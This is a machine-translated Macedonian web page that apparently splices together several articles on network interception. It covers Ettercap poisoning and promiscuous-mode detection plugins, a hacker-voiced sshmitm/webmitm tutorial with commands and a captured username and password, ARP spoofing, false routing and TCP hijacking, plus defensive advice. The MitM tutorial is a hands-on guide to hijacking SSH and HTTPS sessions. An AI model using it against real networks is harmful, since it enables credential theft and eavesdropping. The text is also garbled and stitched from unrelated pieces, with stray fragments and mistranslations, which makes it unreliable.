Ќе провери дали некој се мамка помеѓу некој од домаќините на списокот и нас. Прво, проверува дали два домаќини во списокот го имаат истото мак адреса. Ова може да значи дека еден од нив не труе преправајќи се дека е другиот. Може да генерира многу лажни позитиви во прокси-арп средина. Мора да изградите листа на домаќини за да ја извршите оваа проверка. После тоа, испраќа icmp echo пакети до секој хост во списокот и проверува дали mac-адресата на изворот на одговор е различна од адресата што ја зачувавме во списокот со таа IP адреса. Ова може да значи дека некој го мами овој хост преправајќи се дека ја има нашата IP адреса и ни ги препраќа пресретнатите пакети. Не можете да го извршите овој активен тест во ненавредлив режим.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Се обидува да открие дали некој душка (слуша) во промискуитетен режим. Испраќа две различни лошо формирани arp барања до секоја цел во списокот на домаќини и чека одговори. Ако одговорот дојде од целниот домаќин, повеќе или помалку е веројатно дека целта ја има мрежната картичка во промискуитетен режим. Може да генерира лажни аларми. Можете да го извршите или од командната линија или од менито за додатоци. Бидејќи ги слуша одговорите на arp, ќе биде подобро ако не ги користите додека испраќате барања за arp.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Пример за успешно погодување на две мрежни картички во промискуитетен режим:

Прошири

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 авторски права 2001-2015 Тим за развој на Ettercap Слушање на: eth0 -> 08:00:27:AF:30:B9 192.168.1.3250/25 27ff:feaf:30b9/64 Дисекцијата на SSL бара валидна скрипта „redir_command_on“ во датотеката etter.conf Ettercap можеби нема да работи правилно. /proc/sys/net/ipv6/conf/eth0/use_tempaddr не е поставено на 0. Привилегиите паднаа на EUID 65534 EGID 65534... 33 приклучоци 42 дисектори на протоколи 57 порти надгледувани 20388 mac продавач на отпечатоци од прст 18 OS6 услуги отпечаток од прст 18 OS6 познат : нема наведени скрипти, не се стартува! Рандомизирање на 255 хостови за скенирање... Скенирање на целата мрежна маска за 255 хостови... * |============================== ==================================>| 100,00% 5 хостови додадени во списокот на домаќини... Започнува унифицирано душкање... Активиран е само текст интерфејсот... Притиснете „h“ за помош во линија. : - 192.168.1.36 - 192.168.1.34 Најверојатно душкаат NIC: - НИКОЈ Затворање на текстуален интерфејс... Се прекинува ettercap... Чистењето на Луа е завршено! Унифицираното душкање беше запрено.

7,9 ssl лента

За време на SSL mitm напад, ettercap го заменува вистинскиот SSL сертификат со свој. Лажниот сертификат се креира во лет и сите полиња се пополнуваат во согласност со вистинскиот сертификат презентиран од серверот.

(62%)

(56.5%)

(СЛУЧАЈНО - 0,2%)

Во оваа статија ќе ги разгледаме нападите како Man-in-the-Middle, поточно методот
пренасочување на сообраќајот SSH и HTTP користејќи го нападот Man in the Middle. Да не ја влечеме мачката за опашката, туку да се фатиме за работа.

Човек во средината (накратко MitM, од руски едноставно - „напад на посредникот“ или „човек
во средината") е тип на напад заснован на пренасочување на сообраќајот помеѓу две машини за пресретнување на информации - дополнително проучување, уништување или менување. Значи, првото нешто што ни треба е пакетот dsniff (ќе видите врска до пакетот на крајот на статијата).Зошто Да, затоа што овој пакет ги содржи сите потребни алатки, вклучително и sshmitm (пренасочување на сообраќајот на SSH) и httpmitm (пренасочување на сообраќајот на HTTP), кои можат да ја заобиколат следната безбедносна шема: колку што знаете, протоколи со шифрирањето на податоците е прилично -тие се „безбедни“ (шифрирањето помага :)) и не дозволуваат нападите да се вршат „на врвот“ на мрежниот слој.Клучот за шифрирање е непознат за хакерот - невозможно е да се дешифрираат податоците и вметнете команда.Се чини дека е во ред, но еве како
бидејќи програмите за напад MitM (sshmitm и httpmitm) од пакетот dsniff можат да заобиколат овој систембезбедност (можете да заобиколите речиси сè). Сето ова е направено според следниот принцип:
средниот хост го прима барањето од клиентот, „велејќи“ дека тоа е серверот, а потоа се поврзува со вистинскиот сервер.
Втората работа што ни треба се исправени раце, четвртата работа - најважната работа - е желбата и, се разбира, жртва, односно компјутерот што ќе го нападнеме.

Пренасочување на сообраќајот на SSH

Откако ги подготвивте алатките, сфативте што е што и зошто :). Земете sshmitm - сега ќе го пренасочиме сообраќајот на SSH (сè што не сте разбрале со теоретскиот дел - прочитајте погоре)
користејќи го, искористувајќи ги недостатоците на денешната PKI (инфраструктура на јавен клуч - шема за управување со клучот заснована на
методи на асиметрична криптографија). Ајде да ја погледнеме синтаксата
sshmitm:

sshmitm [-d] [-I] [-p порта] домаќин

Д
дозволи излез за отстранување грешки (т.е. понапреден режим)

Јас
киднапирање на сесија

P порта
пристаниште за слушање

домаќин
адреса на далечинскиот домаќин чии сесии ќе бидат пресретнати

пристаниште
порта на оддалечениот домаќин

Сè изгледа едноставно и вкусно - нема ништо комплицирано :). Да почнеме да го спроведуваме нападот!

# sshmitm server.target.gov // наведете го вашиот SSH сервер
sshmitm: пренесување на серверот server.target.gov

Бидејќи немаме вистински SSH клуч, командниот преведувач на нападнатиот
ќе прикаже барање за проверка на клучот на домаќинот, сето тоа ќе изгледа вака:

clientmachine$ server.target.gov
@ПРЕДУПРЕДУВАЊЕ: ИДЕНТИФИКАЦИЈАТА НА ДАЛЕЧИНСКИОТ ДОМАЌИН СЕ СМЕНЕ! @
МОЖНО Е НЕКОЈ ДА ПРАВИ НЕШТО ГОДНО!
Некој може да ве прислушува во моментов (напад човек во средината)!
Исто така, можно е клучот за домаќин RSA да е тукушто променет.
Контактирајте со вашиот системски администратор.

И тогаш корисникот ќе одлучи дали да се поврзе или не. Ако одговорот е да, тогаш ќе имаме целосна контрола врз сесијата SSH.
НО! Ако корисникот никогаш не се поврзал со тој автомобил, може да се прикаже следнава порака:

Не може да се утврди автентичноста на домаќинот „server.target.gov“.
Отпечатокот на клучот RSA е
бла:бла:бла;бла;бла........
Дали сте сигурни дека сакате да продолжите со поврзувањето (да/не)?

Овде корисникот има и два избора - да се поврзе или не. Ако да, тогаш ја пресретнавме седницата, ако не, тогаш за жал... :(.
Во принцип, нападот беше успешен ако корисникот се поврзе, а sshmitm, пак, ги сними сите пропусници и најавувања, и тоа на многу читлив начин :)
Секако, ова не е единствениот пресретнувач на SSH сесии, но штом ќе се запознаете со ова, можете лесно да совладате друг :)

Пренасочување на сообраќајот на HTTP

Сега ќе го пренасочиме HTTP сообраќајот. Повторно, ќе ни треба претходно избрана алатка: httpmitm, која ги слуша портите 80 (HTTP -) и 443 (HTTPS -), ги пресретнува WEB-барањата, потоа се поврзува со серверот и ги препраќа барањата до клиентскиот компјутер. Програмата исто така генерира SSL клучеви и SSL сертификати користејќи OpenSSL. Потоа, по обидот
се поврзува на страницата (target.gov), прелистувачот ќе го провери SSL сертификатот. Бидејќи сертификатите нема да се совпаѓаат, прелистувачот на корисникот ќе предупреди
неточен SSL сертификат. Од перспектива на напаѓачот ќе изгледа вака:

#webmitm -d
webmitm: пренесување транспарентно
webmitm: нова врска од
ДОБИЈ [врска]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[верзија]
Врска: [тип]
Домаќин: www.target.gov
Кориснички агент: [систем, информации за прелистувачот]
[итн, итн, итн.]
Колаче: [колачиња]

Вака сето тоа изгледа однадвор -
SSL конекцијата е пресретната, зафаќајќи нешифрирани податоци.

Заклучок

Во оваа статија, го разгледавме пренасочувањето на сообраќајот SSH и HTTP користејќи го нападот Man in the Middle - јасно, детално, накратко. Други HTTP и SSH пренасочувачи
Ќе го совладате сообраќајот со помош на MitM брзо ако сте ги совладале и овие :)). Ако нешто беше нејасно, тогаш ...

Пресретнувањето на податоци преку мрежа е прием на какви било информации од далечински компјутерски уред. Може да се состои од лични информации на корисникот, неговите пораки и евиденција за посети на веб-локација. Снимањето податоци може да се врши со шпионски софтвер или со помош на мрежни трагачи.

Spyware е специјален софтвер кој може да ги сними сите информации пренесени преку мрежа од одредена работна станица или уред.

Трагач е програма или компјутерска технологија која пресретнува и анализира сообраќај што минува низ мрежата. Трагачот ви овозможува да се поврзете на веб-сесија и да вршите различни операции во име на сопственикот на компјутерот.

Доколку информациите не се пренесуваат во реално време, шпионски софтвергенерира извештаи што го олеснуваат прегледувањето и анализирањето на информациите.

Пресретнувањето на мрежата може да се врши легално или незаконски. Главниот документ кој ја утврдува законитоста на добивање информации е Конвенцијата за компјутерски криминал. Создаден е во Унгарија во 2001 година. Правните барања може малку да се разликуваат од држава до држава, но клучната порака е иста за сите земји.

Класификација и методи на пресретнување на податоци преку мрежата

Во согласност со горенаведеното, следењето на информации преку мрежа може да се подели на два вида: овластено и неовластено.

Овластеното собирање податоци се врши за различни цели, почнувајќи од заштита на корпоративните информации до обезбедување на национална безбедност. Основите за извршување на таква операција се утврдени со законодавство, специјални служби, службеници за спроведување на законот и специјалисти административни организациии безбедносните служби на компанијата.

Постојат меѓународни стандарди за вршење на следење податоци. Европскиот институт за телекомуникациски стандарди успеа да усогласи голем број технички процеси (ETSI ES 201 158 „Телекомуникациска безбедност; законско следење (LI); Барања за мрежни функции“) на кои се заснова следењето на информациите. Како резултат на тоа, беше развиена системска архитектура која им помага на специјалистите на тајните служби и мрежните администратори легално да добијат податоци од мрежата. Развиената структура за спроведување на следење на податоци преку мрежата се користи за жичени и безжични системигласовни повици, како и кореспонденција по пошта, пренос на говорни пораки преку IP, размена на информации преку СМС.

Неовластено следење на податоци преку мрежа го вршат напаѓачи кои сакаат да поседуваат доверливи податоци, лозинки, корпоративни тајни, адреси на компјутерски машини на мрежата итн. За да ги постигнат своите цели, хакерите обично користат анализатор на мрежен сообраќај - трагач. Оваа програмаили хардверско-софтверски уред му дава на измамникот можност да пресретнува и анализира информации во рамките на мрежата на која е поврзан корисникот-жртва, вклучително и шифриран SSL сообраќај преку измама на сертификати. Податоците за сообраќајот може да се добијат на различни начини:

слушање на мрежниот интерфејс,
поврзување на уред за пресретнување со прекин на каналот,
создавање сообраќајна гранка и нејзино дуплирање на трагачот,
со извршување на напад.

Исто така, постојат посложени технологии за пресретнување на важни информации кои овозможуваат да се навлезе во мрежните интеракции и да се менуваат податоците. Една таква техника е лажни ARP барања. Суштината на методот е да се заменат IP адресите помеѓу компјутерот на жртвата и уредот на напаѓачот. Друг метод што може да се користи за пресретнување на податоци преку мрежа е лажно рутирање. Тоа вклучува замена на IP адресата на мрежниот рутер со ваша сопствена адреса. Ако сајбер-криминалецот знае како е организирана локалната мрежа во која се наоѓа жртвата, тогаш тој лесно може да го организира приемот на информации од машината на корисникот до неговата IP адреса. Снимањето TCP конекција исто така служи на ефективен начинследење на податоци. Напаѓачот ја прекинува сесијата за комуникација со генерирање и испраќање на TCP пакети до компјутерот на жртвата. Следно, сесијата за комуникација ја обновува, пресретнува и продолжува криминалецот наместо клиентот.

Објект на влијание

Објекти на следење податоци преку мрежата можат да бидат владини агенции, индустриски претпријатија, комерцијални структури и обични корисници. Во рамките на една организација или деловна компанија, информациите може да се фатат со цел да се заштити мрежната инфраструктура. Разузнавачките агенции и агенциите за спроведување на законот можат да вршат масовно следење на информациите што се пренесуваат од различни сопственици, во зависност од задачата што е на располагање.

Ако зборуваме за сајбер-криминалци, тогаш секој корисник или организација може да стане предмет на влијание за да добие податоци пренесени преку мрежата. Со овластен пристап, информативниот дел од добиените информации е важен, додека напаѓачот е повеќе заинтересиран за податоци што може да се користат за запленување во кешили вредни информации за неговата следна продажба.

Најчесто, корисниците кои се поврзуваат на јавна мрежа, на пример во кафуле со хотспот, стануваат жртви на следење информации од сајбер-криминалци. Wi-Fi пристап. Напаѓачот се поврзува со веб-сесија користејќи трагач, ги заменува податоците и краде лични информации. Прочитајте повеќе за тоа како се случува ова во статијата.

Извор на закана

Овластеното следење на информации во компаниите и организациите го вршат оператори на јавна мрежна инфраструктура. Нивните активности се насочени кон заштита на лични податоци, трговски тајни и друго важна информација. Законски, преносот на пораки и досиеја може да го следат разузнавачките служби, агенциите за спроведување на законот и разни владини агенции за да се обезбеди безбедноста на граѓаните и државата.

Криминалците се занимаваат со незаконско следење податоци. За да избегнете да станете жртва на сајбер криминалец, треба да следите некои препораки од експерти. На пример, не треба да вршите операции кои бараат овластување и пренос на чувствителни податоци на места каде што врската е со јавни мрежи. Побезбедно е да се изберат мрежи со шифрирање, а уште подобро - да се користат лични 3G и LTE модеми. При пренос на лични податоци, се препорачува да се шифрираат со помош на протоколот HTTPS или личен VPN тунел.

Можете да го заштитите вашиот компјутер од пресретнување на мрежниот сообраќај користејќи криптографија и анти-sniffers; Dial-up наместо безжичен мрежен пристап ќе ги намали ризиците.

Оваа лекција ги опишува технологиите за мрежно хакирање базирани на пресретнување мрежни пакети. Хакерите користат такви технологии за да го слушаат мрежниот сообраќај со цел да украдат вредни информации, да организираат пресретнување на податоци со цел напад од човек во средината, да пресретнат TCP конекции, да дозволуваат, да речеме, измама на податоци и да вршат други , не помалку интересни акции. За жал, повеќето од овие напади се всушност имплементирани само за Unix мрежи, за кои хакерите можат да ги користат и двете специјални комунални услуги, и Unix системски алатки. Мрежите на Windows, очигледно, беа игнорирани од хакерите, и ние сме принудени да го ограничиме нашиот опис на алатките за следење податоци на програми за трагање дизајнирани за тривијално слушање на мрежни пакети. Сепак, не треба да се занемари барем теоретски опис на таквите напади, особено за анти-хакери, бидејќи познавањето на користените технологии за хакирање ќе помогне да се спречат многу неволји.

Мрежно душкање

Обично се користи за душкање на етернет мрежи. мрежни картичкисе префрли на режим на слушање. Слушање Етернет мрежибара поврзување на компјутер што работи со програма за трагање со мрежен сегмент, по што целиот мрежен сообраќај испратен и примен од компјутерите во овој мрежен сегмент станува достапен за хакерот. Уште полесно е да се пресретне сообраќајот од радио мрежите што користат безжични мрежни посредници - во овој случај, дури и не треба да барате место за поврзување со кабелот. Или напаѓачот може да се поврзе на телефонската линија што го поврзува компјутерот со Интернет-серверот, наоѓајќи погодно место за ова (телефонските линии обично се поставуваат во подруми и други ретко посетени места без никаква заштита).

За да ја демонстрираме технологијата на душкање, ќе ја користиме многу популарната програма за душкање SpyNet, која може да се најде на многу веб-страници. Официјалната веб-страница на програмата SpyNet се наоѓа на http://members.xoom.com/layrentiu2/, каде што можете да преземете демо верзија на програмата.

Програмата SpyNet се состои од две компоненти - CaptureNet и PipeNet. Програмата CaptureNet ви овозможува да пресретнете пакети што се пренесуваат преку етернет мрежа на ниво на мрежа, т.е. во форма на етернет рамки. Софтверот PipeNet ви овозможува да соберете Ethernet рамки во пакети со апликациски слој, обновувајќи, на пример, пораки Е-пошта, HTTP протокол пораки (размена на информации со веб-серверот) и вршат други функции.

За жал, во демонстрацијата на SpyNet, можностите на PipeNet се ограничени на демото на склопување пакети HTTP, така што нема да можеме целосно да го демонстрираме SpyNet. Како и да е, ќе ги демонстрираме можностите за мрежно шмркање на SpyNet користејќи ја нашата експериментална мрежа како пример со полагање текстуална датотекаод домаќинот Sword-2000 до домаќинот Alex-Z користејќи го вообичаеното Windows Explorer. Во исто време, на компјутерот A1ex-1 ќе ја стартуваме програмата CaptureNet, која ќе ги пресретне пренесените пакети и ќе ни овозможи да ја читаме содржината на пренесената датотека во Ethernet рамки. На сл. 1 го прикажува текстот на тајната порака во датотеката secret.txt; ќе се обидеме да го најдеме овој текст во заробените етернет рамки.

Ориз. 1. Текст на тајната порака во прозорецот на Notepad

За да снимате етернет рамки, следете ги овие чекори:

На компјутерот Alex-Z, стартувајте ја програмата CaptureNet. Во прикажаниот работен прозорец на програмата, изберете ја командата од менито Capture * Start (Capture * Start) и започнете со процесот на пресретнување на мрежните рамки.

Со помош на Windows Explorer, копирајте ја датотеката security.txt од компјутерот Sword-2000 на A1ex-3.

Откако ќе ја префрлите датотеката secret.txt, изберете ја командата од менито Capture * Stop и запрете го процесот на снимање.

Сниманите Ethernet рамки ќе се појават на десната страна од прозорецот на програмата CaptureNet (Слика 2), при што секој ред во горниот список претставува рамка за етернет, а под списокот содржината на избраната рамка.

Ориз. 2. Рамката за етернет содржи текст на тајна порака

Откако ја разгледавме листата на пресретнати рамки, лесно можеме да ја најдеме онаа што го содржи текстот што го пренесовме Ова е многу голема тајна (Ова е многу голема тајна).

Нагласуваме дека ова е наједноставниот пример, кога е снимен целиот пресретнат мрежен сообраќај. CaptureNet ви овозможува да пресретнувате пакети испратени преку одредени протоколи и до одредени порти за домаќини, да избирате пораки со специфична содржина и да ги акумулирате снимените податоци во датотека. Техниката за извршување на ваквите дејства е едноставна, а може да се научи со помош на системот за помош на програмата SpyNet.

Покрај примитивното мрежно прислушување, хакерите имаат пристап до пософистицирани средства за следење податоци. Подолу е даден краток преглед на таквите методи, иако од теоретски аспект. Причината е што за мрежите на Windows, практичната имплементација на нападите за следење податоци е крајно ограничена, а множеството на сигурни комунални услуги за напади од пресретнување е прилично слабо.

Методи за пресретнување на мрежниот сообраќај

Мрежното душкање со помош на програми за мрежни анализатори како CaptureNet погоре е првиот, наједноставен начин за пресретнување на податоците. Покрај SpyNet, многу алатки се користат за мрежно шмркање, првично развиени за целите на анализа на мрежната активност, дијагностицирање на мрежи, избор на сообраќај според одредени критериуми и други задачи за администрирање на мрежата. Пример за таква програма е tcpdump (http://www.tcpdump.org), кој ви овозможува да го снимате мрежниот сообраќај во посебен дневник за последователна анализа.

За заштита од мрежно прислушување, се користат специјални програми, на пример, AntiSniff (http://www.securitysoftwaretech.com/antisniff), кои се способни да ги идентификуваат компјутерите на мрежата кои слушаат мрежниот сообраќај. За да ги решат своите проблеми, програмите против шини користат посебен знак за присуство на уреди за слушање на мрежата - мрежната картичка на компјутерот за трагачи мора да биде во посебен режим на слушање. Додека се во режим на слушање, мрежните компјутери реагираат на посебен начин на IP датаграми испратени до домаќинот што се тестира. На пример, домаќините за слушање обично го обработуваат целиот дојдовен сообраќај, а не само датаграмите испратени на адресата на домаќинот. Постојат и други знаци кои укажуваат на сомнително однесување на домаќинот што може да го препознае AntiSniff.

Лажни ARP барања

За да го пресретне и да го преземе процесот на мрежна интеракција помеѓу два домаќини А и Б, напаѓачот може да ги замени IP адресите на домаќините во интеракција со своја IP адреса со испраќање фалсификувани ARP (Address Resolution Protocol) пораки до домаќините A и B. Можете да се запознаете со протоколот ARP во Додаток D, кој ја опишува постапката за решавање (конвертирање) на IP адресата на домаќинот во адресата на машината (MAC адреса) хардкодирана во мрежната картичка на домаќинот. Ајде да видиме како хакер може да користи ARP за пресретнување на мрежните комуникации помеѓу домаќините А и Б.

Напаѓачот ги одредува MAC адресите на домаќините A и B, на пример, користејќи ја командата nbtstat од пакетот W2RK.

Напаѓачот испраќа пораки до идентификуваните MAC адреси на домаќините А и Б, кои се фалсификувани ARP одговори на барањата за решавање на IP адресите на домаќините до MAC адресите на компјутерите. Домаќинот А е информиран дека IP адресата на домаќинот Б одговара на MAC адресата на компјутерот на напаѓачот; домаќинот Б е информиран дека IP адресата на домаќинот А исто така одговара на MAC адресата на компјутерот на напаѓачот.

Домаќините A и B ги складираат примените MAC адреси во нивните ARP кешови и потоа ги користат за испраќање пораки еден на друг. Бидејќи IP-адресите А и Б одговараат на MAC адресата на компјутерот на напаѓачот, домаќините А и Б, несомнено, комуницираат преку посредник кој може да направи се со нивните пораки.

За да се заштитат од такви напади, мрежните администратори мора да одржуваат база на податоци со табела на кореспонденција помеѓу MAC адресите и IP адресите на нивните мрежни компјутери. Следно, користејќи специјален софтверНа пример, алатките на arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) може периодично да ја истражуваат мрежата и да идентификуваат недоследности.

На UNIX мрежите, овој тип на лажни напади со барање ARP може да се имплементира со користење на системски услужни програми за следење и управување со мрежниот сообраќај, како што е arpredirect. За жал, се чини дека таквите сигурни комунални услуги не се имплементирани на мрежите Windows 2000/XP. На пример, на веб-локацијата NTsecurity (http://www.ntsecurity.nu) можете да ја преземете алатката GrabitAII, претставена како алатка за пренасочување на сообраќајот помеѓу мрежните хостови. Сепак, основната проверка на функционалноста на алатката GrabitAII покажува дека целосниот успех во спроведувањето на неговите функции е сè уште далеку.

Лажно рутирање

За да изврши лажно рутирање, напаѓачот мора да знае некои детали за организацијата на локалната мрежа во која се наоѓа домаќинот А, особено, IP адресата на рутерот преку кој сообраќајот се испраќа од домаќинот А до Б. Знаејќи го ова, напаѓачот ќе генерира IP датаграм во кој IP - адресата на испраќачот е дефинирана како IP адреса на рутерот, а примачот е домаќинот А. Исто така вклучена во датаграмот е порака ICMP Redirect со полето за адреса на новиот рутер поставено на IP адреса на компјутерот на напаѓачот. Откако ја примил таквата порака, домаќинот А ќе ги испрати сите пораки до IP адресата на компјутерот на напаѓачот.

Горенаведените примери на пресретнување (на кои можностите на напаѓачите се далеку од ограничени) нè убедуваат во потребата да се заштитат податоците што се пренесуваат преку мрежата доколку податоците содржат доверливи информации. Единствениот метод за заштита од пресретнување на мрежниот сообраќај е употребата на програми кои имплементираат криптографски алгоритми и протоколи за шифрирање и спречуваат откривање и замена на тајни информации. За да се решат ваквите проблеми, криптографијата обезбедува алатки за шифрирање, потпишување и потврдување на автентичноста на пораките пренесени преку безбедни протоколи

Практичната имплементација на сите криптографски методи за заштита на размена на информации опишани во Поглавје 4 е обезбедена од мрежите VPN (Виртуелна приватна мрежа). Краток преглед на криптографските безбедносни принципи и техники може да се најде во Додаток Е, и Детален описалатки за криптографска заштита обезбедени од апликацијата PGP Desktop Security (http://www.pgp.com).

Пресретнување на TCP конекција

Создадени се неколку ефективни алатки за извршување на напади за киднапирање на TCP конекција, но сите од нив се имплементирани за платформата Unix, а на веб-страниците овие алатки се претставени само во форма на изворен код. Така, како убедени практичари за благородната причина за хакирање, нападите со методот на пресретнување на конекцијата TCP не ни се многу корисни. (Оние кои сакаат да го разберат програмскиот код на другите луѓе можат да се обратат на страницата http://www.cri.cz/~kra/index.html, каде што можете да преземете извордобро познатата алатка за пресретнување на конекција Hunt TCP од Павел Крауз).

И покрај недостатокот на практични алатки, не можеме да игнорираме толку интересна тема како што е пресретнувањето на TCP конекции и ќе се задржиме на некои аспекти од таквите напади. Некои информации за структурата на TCP пакетот и постапката за воспоставување на TCP конекции се дадени во Додаток D од оваа книга, но овде ќе се фокусираме на прашањето - што точно им дозволува на хакерите да вршат напади за пресретнување на TCP конекција? Да ја разгледаме оваа тема подетално, потпирајќи се главно на дискусијата во и.

TCP протоколот (Transmission Control Protocol) е еден од основните протоколи за транспортен слој на OSI кој ви овозможува да воспоставите логички врски преку виртуелен комуникациски канал. Преку овој канал се пренесуваат и примаат пакети со снимена нивната секвенца, се контролира протокот на пакети, се организира реемитување на искривените пакети и на крајот од сесијата се прекинува каналот за комуникација. TCP протоколот е единствениот основен протокол во семејството TCP/IP кој има напреден систем за идентификација и поврзување на пораките.

За да се идентификува TCP пакет, постојат два 32-битни идентификатори во насловот на TCP, кои исто така дејствуваат како бројачи на пакети, наречени секвенциски број и број за потврда. Ќе нè интересира уште едно поле од TCP пакетот, наречено контролни битови. Ова 6-битно поле ги вклучува следните контролни битови (по редослед од лево кон десно):

УРГ - знаме за итност;

ACK - знаменце за потврда;

PSH - знаме за носење;

RST - знаме за повторно воспоставување на врската;

SYN - знаменце за синхронизација;

FIN - знаменце за завршување на врската.

Ајде да ја разгледаме постапката за создавање на TCP конекција.

1. Ако домаќинот А треба да создаде TCP конекција со домаќинот B, тогаш домаќинот А му ја испраќа на домаќинот B следната порака:

A -> B: SYN, ISSa

Ова значи дека пораката испратена од домаќинот А има поставено знаменце SYN (Синхронизирај секвенциски број), а полето за број на секвенца е поставено на почетната 32-битна вредност ISSa (Почетен број на секвенца).

2. Како одговор на барањето добиено од домаќинот А, домаќинот B одговара со порака во која е поставен битот SYN, а битот ACK е поставен. Во полето за секвенца број, домаќинот B ја поставува својата почетна бројач вредност - ISSb; полето со број за потврда потоа ќе ја содржи вредноста на ISSa добиена во првиот пакет од домаќинот А, зголемена за еден. Така, домаќинот Б одговара со оваа порака:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Конечно, домаќинот A испраќа порака до домаќинот B, во која: ACK битот е поставен; полето за број на низа ја содржи вредноста ISSa + 1; Полето за број за потврда ја содржи вредноста ISSb + 1. После ова, TCP врската помеѓу домаќините А и Б се смета за воспоставена:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Сега домаќинот А може да испраќа пакети со податоци до домаќинот Б преку новосоздадениот виртуелен TCP канал:

A -> B: ACK, ISSa+1, ACK(ISSb+1); ПОДАТОЦИ

Овде DATA означува податоци.

Од алгоритмот за креирање на TCP конекција дискутиран погоре, може да се види дека единствените идентификатори на TCP претплатниците и TCP конекцијата се два 32-битни параметри на секвенцискиот број и бројот на потврдата - ISSa и ISSb. Затоа, ако хакерот успее да ги дознае тековните вредности на полињата ISSa и ISSb, тогаш ништо нема да го спречи да генерира фалсификуван TCP пакет. Ова значи дека хакерот треба само да ги избере тековните вредности на параметрите ISSa и ISSb на TCP пакетот за дадена TCP конекција, да го испрати пакетот од кој било Интернет хост во име на клиентот на оваа TCP конекција и овој пакет ќе се сфати како точно!

Опасноста од ваквото лажирање на TCP пакетите е исто така важна бидејќи протоколите FTP и TELNET на високо ниво се имплементирани врз основа на протоколот TCP, а идентификацијата на клиентите на пакетите FTP и TELNET е целосно заснована на протоколот TCP.

Дополнително, бидејќи протоколите FTP и TELNET не ги проверуваат IP адресите на испраќачите на пораки, откако ќе добијат фалсификуван пакет, серверите FTP или TELNET ќе испратат порака за одговор до IP адресата на хакерскиот хост наведен во лажниот пакет. По ова, хакерскиот хост ќе започне да работи со серверот FTP или TELNET од неговата IP адреса, но со правата на легално поврзан корисник, кој, пак, ќе изгуби контакт со серверот поради неусогласеност на бројачите.

Така, за да се изврши нападот опишан погоре, неопходен и доволен услов е познавањето на двата тековни 32-битни параметри ISSa и ISSb кои ја идентификуваат TCP врската. Ајде да размислиме можни начинипримајќи ги. Во случај кога хакерскиот хост е поврзан со нападнатиот мрежен сегмент, задачата за добивање на вредностите на ISSa и ISSb е тривијална и може да се реши со анализа на мрежниот сообраќај. Затоа, неопходно е јасно да се разбере дека протоколот TCP, во принцип, дозволува да се заштити врската само ако е невозможно напаѓачот да пресретне пораки пренесени преку оваа врска, односно само во случај кога хакерскиот хост е поврзан со мрежен сегмент различен од претплатничкиот сегмент на TCP конекцијата.

Затоа, нападите меѓу сегментите се од најголем интерес за хакерот, кога напаѓачот и неговата цел се во различни мрежни сегменти. Во овој случај, задачата за добивање на вредностите на ISSa и ISSb не е тривијална. За да се реши овој проблем, сега се измислени само два методи.

Математичко предвидување на почетната вредност на параметрите за поврзување TCP со екстраполација на претходните вредности на ISSa и ISSb.

Искористување на пропусти при идентификување на претплатници на TCP конекција на Unix rsh серверите.

Првата задача е решена преку длабински студии за имплементацијата на протоколот TCP во различни оперативни системии сега има чисто теоретско значење. Вториот проблем е решен со користење на ранливости Unix системисо идентификување на доверливи домаќини. (Доверливо во однос на даден хост А е мрежен домаќин Б чиј корисник може да се поврзе со домаќинот А без автентикација користејќи ја r-услугата на домаќинот А). Со манипулирање со параметрите на TCP пакетите, хакерот може да се обиде да имитира доверлив хост и да пресретне TCP врска со нападнатиот домаќин.

Сето ова е многу интересно, но практичните резултати од овој вид на истражување сè уште не се видливи. Затоа, ги советуваме сите што сакаат подлабоко да навлезат во оваа тема да се насочат кон книгата, од каде главно се преземени информациите презентирани погоре.

Заклучок

Пресретнувањето мрежни податоци е најефективниот метод за мрежно хакирање, дозволувајќи му на хакерот да ги добие речиси сите информации што циркулираат на мрежата. Најголем практичен развој е постигнат со алатки за душкање, т.е. слушање мрежи; Сепак, не можеме да ги игнорираме методите за пресретнување на мрежните податоци, извршени со мешање во нормалното функционирање на мрежата со цел да се пренасочи сообраќајот кон хакерски домаќин, особено методите за пресретнување на TCP конекции. Меѓутоа, во пракса, последните споменати методи сè уште не добиле доволен развој и треба да се подобрат.

Антихакер треба да знае дека единствениот спас од следењето на податоците е неговото шифрирање, т.е. методи на криптографска заштита. Кога испраќате порака преку мрежата, треба однапред да претпоставите дека кабелскиот систем на мрежата е апсолутно ранлив и секој хакер поврзан на мрежата ќе може да ги фати сите пренесени тајни пораки од него. Постојат две технологии за решавање на овој проблем - создавање VPN мрежа и шифрирање на самите пораки. Сите овие задачи се многу лесни за решавање со помош на софтверскиот пакет PGP Desktop Security (неговиот опис може да се најде, на пример, во).

Популарни во категоријата: